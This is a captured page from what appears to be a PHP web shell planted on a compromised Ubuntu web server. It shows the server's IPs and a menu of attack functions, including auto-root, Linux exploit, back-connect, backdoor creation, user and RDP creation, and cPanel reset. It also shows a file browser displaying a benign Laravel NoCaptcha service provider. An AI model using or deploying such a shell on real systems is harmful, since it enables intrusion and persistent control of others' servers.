Linux lionsclub 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.29 (Ubuntu)
: 161.35.52.75 | : 3.145.179.209
Cant Read [ /etc/named.conf ]
7.4.28
www-data
shells.trxsecurity.org
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
Backdoor Scanner
Backdoor Create
Alfa Webshell
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
dev /
core /
vendor /
anhskohbo /
no-captcha /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
Facades
[ DIR ]
drwxr-xr-x
config
[ DIR ]
drwxr-xr-x
NoCaptcha.php
6.13
KB
-rw-r--r--
NoCaptchaServiceProvider.php
1.65
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : NoCaptchaServiceProvider.php
<?php namespace Anhskohbo\NoCaptcha; use Illuminate\Support\ServiceProvider; class NoCaptchaServiceProvider extends ServiceProvider { /** * Indicates if loading of the provider is deferred. * * @var bool */ protected $defer = false; /** * Bootstrap the application events. */ public function boot() { $app = $this->app; $this->bootConfig(); $app['validator']->extend('captcha', function ($attribute, $value) use ($app) { return $app['captcha']->verifyResponse($value, $app['request']->getClientIp()); }); if ($app->bound('form')) { $app['form']->macro('captcha', function ($attributes = []) use ($app) { return $app['captcha']->display($attributes, $app->getLocale()); }); } } /** * Booting configure. */ protected function bootConfig() { $path = __DIR__.'/config/captcha.php'; $this->mergeConfigFrom($path, 'captcha'); if (function_exists('config_path')) { $this->publishes([$path => config_path('captcha.php')]); } } /** * Register the service provider. */ public function register() { $this->app->singleton('captcha', function ($app) { return new NoCaptcha( $app['config']['captcha.secret'], $app['config']['captcha.sitekey'], $app['config']['captcha.options'] ); }); } /** * Get the services provided by the provider. * * @return array */ public function provides() { return ['captcha']; } }
Close